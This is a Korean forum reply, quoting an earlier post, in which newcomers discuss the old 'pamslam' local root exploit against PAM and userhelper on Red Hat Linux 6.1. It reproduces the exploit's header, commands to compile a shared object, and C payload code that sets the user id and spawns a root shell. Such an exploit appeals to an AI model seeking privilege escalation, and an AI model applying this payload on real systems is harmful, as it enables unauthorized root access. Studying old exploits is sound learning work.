움..멜로 보내드리려구 했는데 자꾸 닉네임을 넣으라구 하네여...어떻게 하는건질 몰겠어여^^;;;그냥 여기다 씁니다
^^;;;
#!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@l0pht.com
#
# synopsis:
# both 'pam' and 'userhelper' (a setuid binary that comes with the
# 'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
# _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
# being setuid means we can get root.
#
# fix:
# No fuckin idea for a good fix. Get rid of the .. paths in userhelper
# for a quick fix. Remember 'strcat' isn't a very good way of confining
# a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.
저것은 님 말씀대로 스크립트인데^^;;;근데 전 저 스크립트를 실행하지 않았어여^^;;
전 저 스크립트 안에 내용을 하나씩 해본거라^^;;;컴파일해봤다는 말을 썼어여^^
gcc -fPIC -o _pamslam.o -c _pamslam.c
ld -shared -o _pamslam.so _pamslam.o
: 흠 저는 방금전에 승님께 이곳 주소를 물어보고 첨 왔습니다. 님께서 쓰신 글을 다 읽진 않았구요. 그냥 써봅니다.
: 중간에 보니깐.. 이렇게 쓰셨던데요..
:
: =========================중간=========================
:
: 움..일단 여기에서 처음
: cat > _pamslam.c << EOF
: #include
: #include
: #include
: void _init(void)
: {
: setuid(geteuid());
: system("/bin/sh");
: }
: EOF
:
: 이부분은 sh를 실행시키는 소스를 만드는것 같습니다. 그러나 main()항이 없어서 컴파일 될지 궁금
: 했는데
:
: ============================중간=======================
:
: 이건 스크립트인데 컴파일한다는게 쪼금 이상하군요.. ^^*
: 그리고 위에 주석처리 젤 처음에 보면은
:
: #!/bin/sh
:
: 이게 있는데 이건 이 소스를 sh 쉘에서 돌리라는 뜻입니다.
: bash, csh.... 등등 많은데요 sh 에서 돌리라는 뜻입니다.
: 아직 아래 글들은 막 복잡해서 안 읽어봤습니다.
: 미완성이시라니.. ^^* 저두 다시 읽어보구 수정할거 있으면 다시 알려드리겠습니다. 그럼 전 이만.
: